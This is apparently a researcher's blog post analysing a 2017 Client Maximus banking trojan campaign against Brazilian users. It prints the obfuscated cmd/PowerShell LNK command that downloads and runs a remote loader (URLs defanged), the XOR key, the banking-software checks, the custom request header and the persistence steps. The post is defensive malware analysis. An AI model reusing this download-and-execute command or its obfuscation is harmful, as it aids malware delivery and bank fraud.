Monday, 23 October 2017

Client Maximus Banking Trojan Attacks active in Brazil

In Sept 2017, Client Maximus payload was discovered by IBM X-Force team and blogged here.

In the past few weeks, I observed that Client Maximus is still being spread to the users in Brazil. Since there is already a good writeup of Client Maximus available in the IBM X-Force blog, I will be adding some details which were not covered there.

In the recent campaign, it was observed that RAR files were sent as an email attachment with an LNK file inside them. This LNK file leverages Powershell to download the Powershell Loader from the URL: hxxps:// which will perform the remaining malicious activities.

MD5 hash of the RAR file: d1ae4ff4f632d4f5e310ca17b084b55e

The target of the LNK file is as shown below:

C:\Windows\system32\cmd.exe /V /C "set wx=^en&&set pr=^e^r^s&&set qr=he^ll&&set wq=^p^o^w&&set dy=^W^i^ndo^ws!wq!!pr!!qr!\^v^1.0\!wq!!pr!!qr!&&echo ^s^ap^s ^"!dy!^" ^"-!wx!c^o^d^e^d SABhAEMAOwBpAGUAeAAoAE4ARQB3AC0AbwBCAGoAZQBjAFQAIABuAEUAVAAuAFcARQBCAGMAbABJA...

After decoding, the Target is as shown below:

HaC;iex(NEw-oBjecT nET.WEBclIenT).doWNloADstRinG('hxxps://');DFG

It's interesting to note that the parameter passed to gl.php is a base64 encoded URL in the format: URL|field. The significance of the field will be explained later in this article.

So, in our case, the above base64 encoded parameter decodes to: hxxps://|22Ub

1st Stage Powershell Loader

After connecting to the above URL, it downloads the first stage Powershell Loader. This loader will download the XOR encrypted .NET assembly from the URL: as shown in Figure 1.

Figure 1

It's encrypted with a single byte XOR key, 0x6a. Once we decrypt it, we can decompile the code to analyze further.

From the main Powershell Code, the Go() method from above decrypted assembly is invoked which is shown in Figure 2.

Figure 2

It first performs a Geo IP check as shown in figure 3 to confirm whether the user is located in Brazil.

Figure 3

It then performs a check for the installed programs as shown in figure 4.

Figure 4.

The list of paths it checks are:

GUID:  E37CB5F0-51F5-4395-A808-5FA49E399F83
GUID:  E37CB5F0-51F5-4395-A808-5FA49E399003
GUID:  E37CB5F0-51F5-4395-A808-5FA49E399008
GUID:  E37CB5F0-51F5-4395-A808-5FA49E399007
GUID:  E37CB5F0-51F5-4395-A808-5FA49E399011
Path: %PROGRAMFILES%\\scpbrad
Path: %ProgramFiles(x86)%\\scpbrad
Path: %ProgramFiles(x86)%\\AppBrad
Path: %LOCALAPPDATA%\\Aplicativo Itau
Path: %SystemDrive%\\Sicoobnet
Path: %PROGRAMFILES%\\Trusteer\\Rapport
Path: %ProgramFiles(x86)%\\Trusteer\\Rapport

Once both these checks have passed, then it continues to perform the following operations:

1. It downloads an Integer code from the URL:  hxxps://
2. Download the filename from the URL: hxxps://
3. Download the exe payload from the URL: hxxps://
4. Download the .NET config from the URL: hxxps://
5. Download the .NET bytecode from the URL: hxxps://

All the above download requests are handled by the methods, dlToText() and dlToFile(). As we can see in Figure 5, these methods will add a custom HTTP header before initiating the request.

Figure 5

The format of the custom HTTP header is: x-id: <field_name>

In our case, the field name is 22Ub. It is important to note that if this HTTP request header is not added to the request, then the server won't respond to the request with the requested data.

After the above functions are completed, the 1st Stage Powershell Loader will create a VBS file which will execute the .NET payload downloaded by the Go() method. In addition to this, another LNK file is created which will execute the VBS file as shown in Figure 6.

Figure 6

I'll add more details of this campaign and the IOCs in a follow up blog.

No comments:

Post a Comment